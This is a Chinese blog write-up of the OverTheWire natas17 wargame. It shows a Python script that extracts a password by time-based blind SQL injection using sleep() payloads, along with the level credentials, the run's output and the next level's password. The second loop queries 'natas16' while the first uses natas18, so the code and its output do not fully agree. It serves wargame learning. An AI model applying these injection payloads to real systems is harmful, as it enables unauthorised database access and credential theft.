码迷,mamicode.com
首页 > 其他好文 > 详细

Overthewire-natas17

时间:2021-06-02 12:01:16      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:php   org   index   lte   存在   python   pre   问题   break   

Overthewire level 17 to level 18

进入页面后,让我们去输入一个用户名看它是否存在。这与第15关很相似,但是不同的是这题关闭了回显。显然,关闭了回显后我们还是能有办法知道对应的sql语句到底执行成功还是失败,这有个技巧叫盲注(Blind injection),通过调用sleep()并且判断请求的时间来实现。
代码如下

import requests

target = ‘http://natas17.natas.labs.overthewire.org/index.php‘

chars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890‘

filtered = ‘‘
passwd = ‘‘

for char in chars:
    payload = {‘username‘: f‘natas18" and password like binary "%{char}%" and sleep(2)#‘}
    resp = requests.post(target, auth=(‘natas17‘, ‘8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw‘), data=payload)
    if resp.elapsed.seconds >= 2:
        filtered += char
        print(filtered)

for _ in range(32):
    for char in filtered:
        payload = {‘username‘: f‘natas16" and password like binary "{passwd + char}%" and sleep(2)#‘}
        resp = requests.post(target, auth=(‘natas17‘, ‘8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw‘), data=payload)
        if resp.elapsed.seconds >= 2:
            passwd += char
            print(passwd)
            break

类似的,先通过filtered把可能的字符集先找出来,然后再慢慢暴力出结果。
代码运行过程如下

d
dg
dgh
dghj
dghjl
dghjlm
dghjlmp
dghjlmpq
dghjlmpqs
dghjlmpqsv
dghjlmpqsvw
dghjlmpqsvwx
dghjlmpqsvwxy
dghjlmpqsvwxyC
dghjlmpqsvwxyCD
dghjlmpqsvwxyCDF
dghjlmpqsvwxyCDFI
dghjlmpqsvwxyCDFIK
dghjlmpqsvwxyCDFIKO
dghjlmpqsvwxyCDFIKOP
dghjlmpqsvwxyCDFIKOPR
dghjlmpqsvwxyCDFIKOPR4
dghjlmpqsvwxyCDFIKOPR47
dghjlmpqsvwxyCDFIKOPR470
x
xv
xvK
xvKI
xvKIq
xvKIqD
xvKIqDj
xvKIqDjy
xvKIqDjy4
xvKIqDjy4O
xvKIqDjy4OP
xvKIqDjy4OPv
xvKIqDjy4OPv7
xvKIqDjy4OPv7w
xvKIqDjy4OPv7wC
xvKIqDjy4OPv7wCR
xvKIqDjy4OPv7wCRg
xvKIqDjy4OPv7wCRgD
xvKIqDjy4OPv7wCRgDl
xvKIqDjy4OPv7wCRgDlm
xvKIqDjy4OPv7wCRgDlmj
xvKIqDjy4OPv7wCRgDlmj0
xvKIqDjy4OPv7wCRgDlmj0p
xvKIqDjy4OPv7wCRgDlmj0pF
xvKIqDjy4OPv7wCRgDlmj0pFs
xvKIqDjy4OPv7wCRgDlmj0pFsC
xvKIqDjy4OPv7wCRgDlmj0pFsCs
xvKIqDjy4OPv7wCRgDlmj0pFsCsD
xvKIqDjy4OPv7wCRgDlmj0pFsCsDj
xvKIqDjy4OPv7wCRgDlmj0pFsCsDjh
xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhd
xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP

第18关的密码为xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP,另外这个代码需要在好一点的网下运行,不然网络本身延迟导致出问题就很尴尬了...

Overthewire-natas17

标签:php   org   index   lte   存在   python   pre   问题   break   

原文地址:https://www.cnblogs.com/wudiiv11/p/natas17.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!